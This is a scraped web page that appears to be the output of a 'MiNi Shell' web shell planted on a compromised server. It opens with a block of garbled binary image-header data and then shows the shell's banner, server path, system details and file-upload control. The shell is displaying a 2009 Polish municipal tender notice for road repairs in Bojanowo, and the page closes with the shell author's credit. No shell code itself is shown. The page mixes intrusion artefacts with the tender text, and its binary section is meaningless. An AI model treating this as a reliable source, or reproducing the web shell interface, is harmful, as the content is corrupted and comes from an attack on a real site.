JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090513/74759-N-2009.html

<p class="kh_header"><b>Bojanowo: Remont  dróg  gminnych :
 - ul. 17  Stycznia  l =325 mb
- ul. Nowa l = 500 mb
- ul. Ratuszowa   l = 97 mb</b><br>
<b>Numer ogłoszenia: 74759 - 2009; data zamieszczenia: 13.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bojanowo , Rynek 12, 63-940 Bojanowo, woj. wielkopolskie, tel. 065 5456230, faks 065 5456640.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminabojanowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  dróg  gminnych :
 - ul. 17  Stycznia  l =325 mb
- ul. Nowa l = 500 mb
- ul. Ratuszowa   l = 97 mb.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót  budowlanych związanych z remontem 
dróg  gminnych  o następującym  zakresie  rzeczowym:

A.	ul. 17  Stycznia l = 325 mb :
- wykonanie prawostronnego cieku  przykrawężnikowego z kostki betonowej
- wykonanie  regulacji wysokościowej urządzeń  kanalizacyjnych i innych
- wyrównanie istniejącej podbudowy bitumicznej betonem asfaltowym w ilości 50kg/m2
- ułożenie w-wy ścieranej z betonu asfaltowego : w-wa gr  4 cm

B. ul. Nowa l = 500 mb
- roboty rozbiórkowe 
-  regulacja wysokościowa urządzeń kanalizacyjnych i innych
- ułożenie  krawężnika nowego oraz przełożenie  częściowe  istniejącego 30x20 cm
- wykonanie obustronnych ścieków  przykrawężnikowych 
- wyrównanie istniejącej podbudowy  betonem asfaltowym w ilości 75 kg/m2
- ułożenie w-wy ścieralnej  z betonu asfaltowego : w-wa gr. 4  cm
- wykonanie  chodników  nowych  z kostki betonowej  gr. 6 cm oraz przełożenie  na  części
   pow. chodników istniejących  , wykonanie  wjazdów  do posesji z kostki bet. gr. 8 cm
- przełożenie istniejących chodników  z płytek betonowych 35x35x5

C  ul.Ratuszowa  l = 97 mb : 
- roboty  rozbiórkowe 
- regulacja wysokościowa urządzeń kanalizacyjnych i innych
- ułożenie krawężnika  betonowego nowego
- wykonanie obustronnych chodników i wjazdów  do posesji z kostki bet. gr. 8 cm
- wyrównanie istniejącej  podbudowy  mieszanką min. asfaltową  w ilości  50 kg/m2
- ułożenie w-wy ścieralnej z betonu asfaltowego : w-wa gr. 4 cm.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zgodnie z art. 45 pzp jest obowiązany wnieść  wadium w wysokości: -  20 000,00 zł (słownie: dwadzieścia tysięcy zł 0 gr)
z tym,  że:
- wadium w pieniądzu należy wpłacić przelewem na konto zamawiającego:  w banku : Bank Spółdzielczy Poniec Oddział Bojanowo Nr  62 8682 0004 0030 3970 2000 0060  najpóźniej przed upływem terminu składania ofert,
- wadium w formie poręczenia lub gwarancji, bankowych lub ubezpieczeniowych, należy wnieść przed upływem terminu składania ofert w pok. nr 12 /sekretariat/ lub w kasie Urzędu Miej-skiego Bojanowo
Wadium może być wniesione w:
a. pieniądzu,
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c. gwarancjach bankowych,
d. gwarancjach ubezpieczeniowych,
e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej.
Wykonawca może powierzyć część wykonania zamówienia podwykonawcom. 
W  przypadku powierzenia zamówienia podwykonawcom należy wskazać w ofercie część zamówienia, której wykonanie powierzone zostanie podwykonawcom.
8.1.	O udzielenie zamówienia mogą ubiegać się wszyscy zainteresowani wykonawcy, którzy:
8.1.1. Posiadają prawo do występowania w obrocie prawnym. 
8.1.2. Posiadają niezbędną wiedzę i doświadczenie w realizacji robót o charakterze odpowiadającym przedmiotowi zamówienia i  zrealizowali  w ostatnich  pięciu latach (2004 - 2008) roboty budowlane (minimum 2 zamówienia),  odpowiadające swoim rodzajem i wartością  niniejszemu zamó-wieniu. 
8.1.3. Dysponują niezbędnym do wykonania zadania potencjałem technicznym lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału  technicznego.
8.1.4. Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, w tym  osobę proponowaną na kierownika  budowy z uprawnieniami budowlanymi w specjalności drogowej  wraz z przynależnością do Izby Inżynierów  Budownictwa.
8.1.5.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, potwierdzone obrotami z ostatnich trzech lat w wysokości  2,0 mln zł rocznie.
8.1.6.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst. art. 24 ustawy.
8.1.7. Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
8.1.8.Zapewnią 3 letni okres gwarancji na wykonane zadanie i maks. 14 dni na podjęcie napraw gwarancyjnych
 Uwaga: W przypadku, gdy o udzielenie zamówienia określonego w niniejszej SIWZ ubiegają się podmioty występujące wspólnie (konsorcjum)  warunki określone w pkt. 8.1.1, 8.1.6. i 8.1.7 musi spełniać każdy podmiot z osobna, pozostałe warunki  sumarycznie.  
8.2.	Z postępowania o udzielenie zamówienia wyklucza się (na podst. art. 24 ustawy Pzp):
8.2.1	wykonawców, którzy wyrządzili szkodę nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu, wydanym w okresie 3 lat przed wszczęciem postępowania;
8.2.2	wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców ,którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomoc-nym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
8.2.3.wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
8.2.4.osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści mająt-kowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie al-bo związku mających na celu popełnienie przestępstwa  lub przestępstwa skarbowego;
8.2.5.spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestęp-stwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na ce-lu popełnienie przestępstwa lub przestępstwa skarbowego;
8.2.6.spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo  przeciwko pra-wom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści mająt-kowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie al-bo w związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8.2.7.spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomoc-nie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekup-stwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także  za przestępstwo  skarbowe lub przestępstwo udziału w zorganizowanej grupie lub związku mających na celu popełnienie przestępstwa lub przestęp-stwa skarbowego;
8.2.8.osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo  przeciwko prawom osób wykonujących pracę zarobkową , przestępstwo przekupstwa, przestęp-stwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizo-wanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8.2.9.podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary; 
8.2.10.wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w pkt. 8.1 SIWZ.
Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy:
8.2.11wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba, że udział tych wykonawców w postępowaniu  nie utrudni uczciwej konkuren-cji, 
8.2.12.złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
8.2.13.nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3,
8.2.14.nie zgodzili się na przedłużenie okresu związania ofertą.
8.3.	Ocena spełnienia warunków:
8.3.1.Oferowane warunki wykonania zamówienia winny być zgodne ze wszystkimi wymogami SIWZ oraz zasadami wynikającymi z ustawy Pzp. 
8.3.2.W przypadku niespełnienia jakiegokolwiek warunku i w konsekwencji dokonania oceny (waru-nek niespełniony) zamawiający odrzuci ofertę na podstawie art. 89 pzp, a złożona przez niego oferta nie bierze udziału w ocenie ofert w oparciu o kryteria oceny ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 9.1.	Ofertę wraz z oświadczeniami - wypełnioną  i podpisaną wg wzoru formularza ofertowego,
9.1.1.  Oświadczenie wykonawcy, że ma prawo do występowania w obrocie prawnym, potwierdzo-ne aktualnym dokumentem stanowiącym podstawę prawną do prowadzenia przez wykonawcę działalności gospodarczej (odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej), wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.1.2.Oświadczenie wykonawcy, że  posiada niezbędną wiedzę i doświadczenie w robotach odpowia-dających przedmiotowi zamówienia,  potwierdzone wykazem wykonanych w  ostatnich pięciu la-tach (2004 - 2008), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  robót budowlanych (minimum 2 zamówienia),  odpowiadającym swoim rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów (referencje)  potwierdzających, że roboty te zostały wykonane  należycie. 
9.1.3.  Oświadczenie wykonawcy, że  dysponuje niezbędnym do wykonania potencjałem technicznym lub zobowiązanie innych podmiotów do udostępnienia sprzętu, potwierdzone wykazem sprzętu ciężkiego, jakim dysponuje wykonawca.
9.1.4.Oświadczenie wykonawcy, że dysponuje osobami zdolnymi do wykonania zamówienia lub 
zobowiązanie innych podmiotów do udostępnienia osób, w tym osobę proponowaną na kierownika budowy  z kopią uprawnień budowlanych i zaświadczeniem o przynależności do Izby Inżynie-rów Budownictwa wraz z załączeniem kopii tych dokumentów.
9.1.5.. Oświadczenie wykonawcy, że znajduje się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia, potwierdzone:
a) zestawieniem danych dotyczących obrotów, 
b) sprawozdaniem finansowym za ostatnie 3 lata obrotowe, w części dotyczącej obrotów, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;
9.1.6.Oświadczenie wykonawcy, że  nie podlega wykluczeniu na podst. art. 24 ustawy Pzp., potwier-dzone:
a) Zaświadczeniem z właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, że wykonaw-ca nie zalega z  opłacaniem  podatków, opłat oraz opłacaniem składek na ubezpieczenie zdrowot-ne i społeczne lub zaświadczeń, że  uzyskał przewidziane prawem  zwolnienie,  odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego organu - wystawionych nie wcześniej niż  3 miesiące przed  upływem terminu składania ofert..
9.1.7. Oświadczenie wykonawcy, że  jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakre-sie prowadzonej działalności gospodarczej, potwierdzone aktualną polisą ubezpieczeniową.
9.1.8.  Oświadczenie wykonawcy, że zapewni 3 letni okres gwarancji i max. 14 dni na  podjęcie napraw 
gwarancyjnych na wykonane zadanie.
9.1.9.Oświadczenie wykonawcy, że zapoznał się z warunkami przetargu i przyjmuje je bez zastrzeżeń.
9.1.10.Oświadczenie wykonawcy, że  zobowiązuje się do zawarcia umowy, jeżeli przetarg wygra.
9.1.11.  Jeżeli wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy zobowiązany jest wskazać tę część zamówienia w załączniku do oferty Wykaz prac do zrealizowania przez pod  wykonawców.
9.1.12. Harmonogram realizacji zamówienia.
9.1.13. Kosztorys ofertowy.
9.1.14. Zaparafowany projekt umowy.
9.1.15. Pełnomocnictwo, ustalające pełnomocnika do reprezentowania, w przypadku podmiotów występujących wspólnie.
9.1.16. Upoważnienie do podpisania oferty, o ile nie wynika z dostarczonych dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminabojanowo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.gminabojanowo.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 10:00, miejsce: Urząd Miejski w Bojanowie
ul. Rynek 12
63-940 Bojanowie
pok. nr 12 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com